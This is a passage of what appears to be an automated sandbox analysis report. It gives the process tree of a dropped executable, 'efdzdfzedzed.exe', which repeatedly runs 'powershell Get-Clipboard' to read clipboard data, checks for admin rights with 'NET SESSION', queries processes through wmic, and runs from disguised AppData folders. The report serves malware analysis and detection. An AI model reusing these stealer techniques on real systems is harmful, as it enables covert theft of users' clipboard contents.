    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4784
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:6100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:5268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3776

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4344

C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
1⤵
PID:2316

C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe
"C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3980
- C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe
  "C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\desdoran" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1924 --field-trial-handle=1928,i,2662371705699741369,8190798636939462576,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2700
- C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe
  "C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=fr --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\desdoran" --mojo-platform-channel-handle=2164 --field-trial-handle=1928,i,2662371705699741369,8190798636939462576,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=5464 get ExecutablePath"
  2⤵
  PID:2840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=5464 get ExecutablePath
    3⤵
    PID:5920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"
  2⤵
  PID:5900
- - C:\Windows\system32\net.exe
    NET SESSION
    3⤵
    PID:2928
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 SESSION
      4⤵
      PID:5712

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:656

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe
1⤵
PID:5064
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe
  2⤵
  - Executes dropped EXE
  PID:4616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe
1⤵
PID:4516
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe
  2⤵
  - Executes dropped EXE
  PID:4496

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4724
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:4052
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27100 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {a7052deb-58b3-4059-9c2e-a396577b0bf7} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
    3⤵
    PID:5320
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2468 -prefsLen 27136 -prefMapHandle 2472 -prefMapSize 270279 -ipcHandle 2476 -initialChannelId {d9776786-6973-4322-87b6-912c301353b4} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
    3⤵
    PID:2252
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3832 -prefsLen 27277 -prefMapHandle 3836 -prefMapSize 270279 -jsInitHandle 3840 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3848 -initialChannelId {d71e6ce6-2c3e-478d-b911-078ff2de6bd6} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
    3⤵
    - Checks processor information in registry
    PID:1660
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4000 -prefsLen 27277 -prefMapHandle 4004 -prefMapSize 270279 -ipcHandle 4100 -initialChannelId {686643c2-7943-4492-9ef1-c8dacb2cb355} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
    3⤵
    PID:5488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4856 -prefsLen 34776 -prefMapHandle 4860 -prefMapSize 270279 -jsInitHandle 4864 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4844 -initialChannelId {c630c789-7d42-4954-baae-acb2471492b3} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
    3⤵
    - Checks processor information in registry
    PID:4356
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5096 -prefsLen 34825 -prefMapHandle 5100 -prefMapSize 270279 -ipcHandle 5112 -initialChannelId {f006003e-f7ec-471f-823e-24fd4054a0a5} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
    3⤵
    - Checks processor information in registry
    PID:708
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5592 -prefsLen 32952 -prefMapHandle 5596 -prefMapSize 270279 -jsInitHandle 5496 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5604 -initialChannelId {802e9ec8-711a-4242-b9ab-1bec707f4967} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
    3⤵
    - Checks processor information in registry
    PID:2668
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5728 -prefsLen 32952 -prefMapHandle 5732 -prefMapSize 270279 -jsInitHandle 5736 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5744 -initialChannelId {5b440749-ae63-4710-bacc-ab606b528bdc} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
    3⤵
    - Checks processor information in registry
    PID:5000
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5916 -prefsLen 32952 -prefMapHandle 5920 -prefMapSize 270279 -jsInitHandle 5924 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5932 -initialChannelId {f0843a31-d7df-4978-a4f5-c2891c66e5cf} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
    3⤵
    - Checks processor information in registry
    PID:1880

C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe
"C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6104
- C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe
  "C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\desdoran" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2056 --field-trial-handle=2068,i,7872626473565385237,8827878421715206704,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2540
